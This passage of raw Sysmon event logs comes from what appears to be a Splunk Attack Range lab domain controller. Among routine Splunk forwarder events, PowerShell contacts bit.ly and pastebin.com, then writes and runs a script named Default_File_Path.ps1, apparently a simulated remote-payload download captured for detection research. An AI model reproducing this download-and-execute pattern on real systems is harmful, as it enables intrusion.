Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40B09E95D17713577B4385A322297B74,SHA256=5BF1E5177B9F77EC5517B512C96399AD45A9ADF3BBE0C6E5A5E0EA111FCFFD29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199778Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:42.528{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14CCD14D3502CD48DD645D8A92B949A9,SHA256=768FA1C822A78C19E6D8897B830A8FB41F21A98E8D425406AB2DC17FBA447B55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199780Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:43.544{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9F08AFEA07F78930C24846A259FCE71,SHA256=8C10E87E9B46F0C64E2E3286335442799622AEF8BB3CF7A72FCF46CC405B71DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199779Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:43.325{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3421F69C72BF2C57DEABBB8CD061831A,SHA256=0A05F9FFCC1D258FA981FDD54C227B12A797F00C2AA5B5205678E61B2BB3F0C2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002199782Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:40.992{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55075-false10.0.1.12-8000- 23542300x80000000000000002199781Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:44.575{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=616D3B29DD499CEE16B9EA9EF76C9B9C,SHA256=47644D8DA7D1FFD057B476AEB0F819C74440612C71E24C3CF8DE63E75AEE43BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199783Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:45.591{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B0FC9AED011104E609E9CBCE8E841C0,SHA256=EC50D8452C81EA7B143A232D77BBE2EF5B083C12FD8D72E3B8FE00A5673CF9C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199784Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:46.606{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=432F5BA65B01C8C42068AC634A75F301,SHA256=7F9EBA1DE7E47078A9F8F317A5B147E4DA86F5874C615B589580F7C2E192045D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199785Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:47.622{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C47006FFC2F01DBAAD93335697F1957,SHA256=088C431FB17E895FCF4DFF17FD3B52809D45B780F78939CB68F6C9B701B7DCA5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199786Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:48.638{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CF4C63073DBD7296D2C8B59796D841E,SHA256=BD6BEF65267798EAAF6B192BDA2E520B29A97A0025015C6ACFD30F7585455F8D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002199790Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:46.039{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55076-false10.0.1.12-8000- 23542300x80000000000000002199789Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:49.669{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8234A5BCC25684D8FEC9738C83C481C,SHA256=B8530DFC87E26468385A668B44C3D39EEB602DBD3B3ACC1ABD82478108B38AA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199788Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:49.435{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9C0BEDB34ABEA5C9C14B2F840CAA3847,SHA256=3EAB384516BCF6DCD5AD2666D792FB60CB6716F8D6BB9C2E372E9DE0468555A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199787Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:49.435{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=60A859F31CAE0373500D15F5D808C590,SHA256=24FB0609B27B396AB2C074CC51A231D34393708D054CF1B39A5C2D2CD977A018,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199791Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:50.685{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=382251BB617277FC6A041D156275586F,SHA256=5697B45D64BC20E588F9ACA20C5CEC734D36F75D412F07A20F854E38536834F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199792Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:51.685{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6EBF9904D261655AAB052E8F503330F,SHA256=31301003D0DF019D40254C670120372F70CCB5EC4567D581BCDDE1453FFEDCFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199793Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:52.700{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DC402AB4868AFE5F517330E8DE6B6E7,SHA256=DACABF12919544FDEC33D2A100C735A60FDA639E7EC53CC8F5F51F2C146C0289,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199796Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:53.701{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60874ABCF2706606155D43D96B1AB947,SHA256=1EE4B3E01B729E417558789F30408C16784508EADA4F84CD8FE7391CF915C4A6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002199795Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:53.091{5ABCFE62-842F-603E-1500-00000000AD01}11041444C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 11241100x80000000000000002199794Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:53.060{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\Default_File_Path.ps12021-03-04 13:50:53.060 354300x80000000000000002199811Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:51.080{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-228.attackrange.local55080-false104.23.98.190-443https 354300x80000000000000002199810Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:51.055{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55079-false10.0.1.12-8000- 354300x80000000000000002199809Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:51.046{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-228.attackrange.local55078-false104.23.98.190-80http 354300x80000000000000002199808Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:51.031{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local63168- 354300x80000000000000002199807Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:50.949{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-228.attackrange.local55077-false67.199.248.11bit.ly80http 354300x80000000000000002199806Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:50.937{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53987- 23542300x80000000000000002199805Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:54.936{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=CC25CC651CAF1966FFF9C10D3925570A,SHA256=715E5A11266C6360C713A504283A351283A1F03CB2DF685C3C9A3D87D1B1EF1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199804Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:54.920{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=FDE08AE954B80F1C0EC084BECEE7989D,SHA256=0D28FE4DD23BD0ABFB1D09097FAE9B454CF4407BBE07CEE5135DE9102B4E9021,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199803Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:54.717{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EA2969F63B8DF0F3F6F34E0E87C834F,SHA256=DF2CF99535B3CB662331EF9507ED7A5F059128B82F73DC6CA919865E92ACAFB4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199802Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:54.576{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F4C006272E4423FA42994FFEAB0E6D2C,SHA256=4D81E3D93B251B9930297A0694C1CB80EEB7F853A8B849C8187D327BE7D49F28,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002199801Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:54.248{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\Default_File_Path.ps12021-03-04 13:50:53.060 23542300x80000000000000002199800Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:54.248{5ABCFE62-D502-6040-CD4B-00000000AD01}6732ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\Default_File_Path.ps1MD5=DCE6250005968B2E1003165602177255,SHA256=4013A9DB2598C677B34A6C4753E91216B844C567D5110931647C38680DE03BAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199799Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:54.092{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9C0BEDB34ABEA5C9C14B2F840CAA3847,SHA256=3EAB384516BCF6DCD5AD2666D792FB60CB6716F8D6BB9C2E372E9DE0468555A8,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002199798Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:54.030{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\Default_File_Path.ps12021-03-04 13:50:53.060 23542300x80000000000000002199797Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:54.030{5ABCFE62-D502-6040-CD4B-00000000AD01}6732ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\Default_File_Path.ps1MD5=DCE6250005968B2E1003165602177255,SHA256=4013A9DB2598C677B34A6C4753E91216B844C567D5110931647C38680DE03BAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199816Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:55.736{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FEC03CB8AC8DB58AA669D969047A002,SHA256=FD2B71F92B8A7E4D98CD792CD0DB4BDA181828AABD1B9A6731D8F0B23E76F2C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199815Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:55.736{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=26E418926264CEB8D998140383D09235,SHA256=C509F36479ACDBC4F89DEB94C2ED0C029A1C952AE73A0B09A9B8BFD98B9548C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199814Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:55.155{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=AC5575FB530BF020CD61554E2356296C,SHA256=415D7119AF008F7D1218D62368ADC2AF6B9500CD7B9C6AAADB790B8B6826709A,IMPHASH=00000000000000000000000000000000falsetrue 22542200x80000000000000002199813Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:51.052{5ABCFE62-D502-6040-CD4B-00000000AD01}6732pastebin.com0::ffff:104.23.98.190;::ffff:104.23.99.190;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 22542200x80000000000000002199812Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:50.953{5ABCFE62-D502-6040-CD4B-00000000AD01}6732bit.ly0::ffff:67.199.248.11;::ffff:67.199.248.10;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002199819Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:56.939{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D36EEDDB42E1FE8D3F0D7B4FD10D605E,SHA256=911C0462C3D46E7AEC06F20A4D0F5922EBDD1813BBCC6442AD258437E5180658,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002199818Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:52.572{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local54998- 23542300x80000000000000002199817Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:56.751{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C11CA6947BE627C51EB3B03445C855CE,SHA256=A64679E7979AC3D8A5491F55F17C4CE9B258D3403B656E86894CC628B76CC134,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002199822Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:53.794{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local55081-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 354300x80000000000000002199821Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:53.794{5ABCFE62-843F-603E-3000-00000000AD01}2464C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local55081-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 23542300x80000000000000002199820Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:57.767{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF9ACDDF1D4B466F3E6344E8F657E73C,SHA256=8ED939F96EAD380F00DF2DC54C6997F0107D8CDEEDA2A9ED5FAFDA6A6F4AC0C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199824Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:58.783{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=413689BD58E4534A70EEE8C09BC78BC7,SHA256=D86A0D8DB2AF073C63B082EC66E9E60554B879122E67F55E22A3708BA084D950,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199823Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:58.033{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9B0644AA843BBD9E173F7C0F1F019B73,SHA256=0DAD1882A50ACA70F09665E0B11CFA86D4F799A438CD3971B9FEB6403EE93086,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199826Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:59.783{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FCAEAE34AC0D2764E9B63F7C8C893ED,SHA256=CE81CEF8845CBFD32DB5FFC94D66A450238FB927D51A9536AB6731AD1B5A1413,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199825Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:59.267{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3D052C70EE198423BEEB9F0CFF25894F,SHA256=AA4E5A021650DA832A28352B22C1B60DC807F0E850F44F65145F4603C65FC184,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199828Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:00.798{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEF53D3E37CEC3E1C77491E09EA7EA5D,SHA256=1AFEE79B72EAA2D2629F8CB8D9DE272461EC02A79431DFE75A124092DD143ABE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002199827Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:56.075{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55082-false10.0.1.12-8000- 23542300x80000000000000002199830Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:01.814{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1A81139606EF8FD7FC8F319A1223BD1,SHA256=180FB00C7B5AC5F455065224DD167CAB5B2E9F4A3AC1B0A457D4C43051AC8815,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199829Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:01.080{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=160EB2DE3F0AA30A42E98FC79409E98F,SHA256=89B639743FA9B2E1978E88BC09B6BA49ED8F923A5ED704DF92CADE98E9D4FDA5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002199840Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:02.845{5ABCFE62-E5C6-6040-C54D-00000000AD01}3960104C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002199839Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:02.814{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 